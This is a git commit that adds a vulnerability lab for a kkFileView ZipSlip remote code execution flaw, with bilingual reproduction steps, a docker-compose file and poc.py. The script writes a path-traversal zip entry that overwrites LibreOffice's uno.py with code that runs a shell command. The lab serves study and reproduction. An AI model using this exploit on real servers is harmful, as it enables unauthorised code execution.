first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/kkfileview/4.3-zipslip-rce/1.png
+++ b/kkfileview/4.3-zipslip-rce/1.png
--- a/kkfileview/4.3-zipslip-rce/2.png
+++ b/kkfileview/4.3-zipslip-rce/2.png
--- a/kkfileview/4.3-zipslip-rce/3.png
+++ b/kkfileview/4.3-zipslip-rce/3.png
--- a/kkfileview/4.3-zipslip-rce/README.md
+++ b/kkfileview/4.3-zipslip-rce/README.md
@@ -0,0 +1,45 @@
+# kkFileView ZipSlip Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+kkFileView is an open source document online preview solution.
+
+In the version prior to 4.4.0-beta, kkFileView has a ZipSlip issue. Attackers can use this issue to upload arbitrary files to the server and execute code.
+
+References:
+
+- <https://github.com/luelueking/kkFileView-v4.3.0-RCE-POC>
+
+## Vulnerable environment
+
+Execute following command to start a kkFileView 3.4.0:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can see the index page at `http://your-ip:8012`.
+
+## Exploit
+
+First, generate a craft POC by [poc.py](poc.py):
+
+```
+python poc.py
+```
+
+A `test.zip` file will be written.
+
+Upload `test.zip` and the [sample.odt](samople.odt) to the kkFileView server:
+
+![](1.png)
+
+Then, click the "preview" button of `test.zip`, the zip file will be listed:
+
+![](2.png)
+
+Finally, click the "preview" button of `sample.odt`.
+
+You can see the `touch /tmp/success` has been executed successful:
+
+![](3.png)
--- a/kkfileview/4.3-zipslip-rce/README.zh-cn.md
+++ b/kkfileview/4.3-zipslip-rce/README.zh-cn.md
@@ -0,0 +1,43 @@
+# kkFileView ZipSlip 远程命令执行漏洞
+
+kkFileView是一个文档预览解决方案。
+
+在kkFileView 4.4.0-beta以前，存在一处ZipSlip漏洞。攻击者可以利用该漏洞，向服务器任意目录下写入文件，导致任意命令执行漏洞。
+
+参考链接：
+
+- <https://github.com/luelueking/kkFileView-v4.3.0-RCE-POC>
+
+## 漏洞环境
+
+执行如下命令启动一个kkFileView 3.4.0服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8012`即可查看到首页。
+
+## 漏洞复现
+
+首先，修改并执行[poc.py](poc.py)，生成POC文件：
+
+```
+python poc.py
+```
+
+然后，`test.zip`将被写入到当前目录下。
+
+上传`test.zip`和[sample.odt](sample.odt)两个文件到kkFileView服务中：
+
+![](1.png)
+
+然后，点击`test.zip`的“预览”按钮，可以看到zip压缩包中的文件列表：
+
+![](2.png)
+
+最后，点击`sample.odt`的“预览”按钮，触发代码执行漏洞。
+
+可见，`touch /tmp/success`已经成功被执行：
+
+![](3.png)
--- a/kkfileview/4.3-zipslip-rce/docker-compose.yml
+++ b/kkfileview/4.3-zipslip-rce/docker-compose.yml
@@ -0,0 +1,7 @@
+version: '2'
+services:
+ web:
+   image: vulhub/kkfileview:4.3.0
+   ports:
+    - "8012:8012"
+    - "5005:5005"
--- a/kkfileview/4.3-zipslip-rce/poc.py
+++ b/kkfileview/4.3-zipslip-rce/poc.py
@@ -0,0 +1,13 @@
+import zipfile
+
+if __name__ == "__main__":
+    try:
+        binary1 = b'vulhub'
+        binary2 = b"import os\nos.system('touch /tmp/success')\n"
+        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
+        # info = zipfile.ZipInfo("test.zip")
+        zipFile.writestr("test", binary1)
+        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
+        zipFile.close()
+    except IOError as e:
+        raise e
--- a/kkfileview/4.3-zipslip-rce/sample.odt
+++ b/kkfileview/4.3-zipslip-rce/sample.odt